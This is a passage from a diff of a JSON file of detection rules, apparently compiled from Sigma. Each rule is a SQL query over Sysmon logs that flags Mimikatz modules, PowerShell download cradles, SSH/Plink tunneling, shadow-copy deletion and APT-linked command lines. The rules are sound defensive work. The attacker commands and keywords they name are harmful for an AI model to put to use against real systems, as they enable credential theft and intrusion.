ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' 
AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", "status": 
"experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate scripts located on other partitions such as \"D:\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "status": "experimental", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.t1572" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE 
'%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "title": "Writing Of Malicious Files To The Fonts Folder", + 
"id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ + "attack.t1211", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 
'%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", - "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' 
ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", 
"tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. 
Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE 
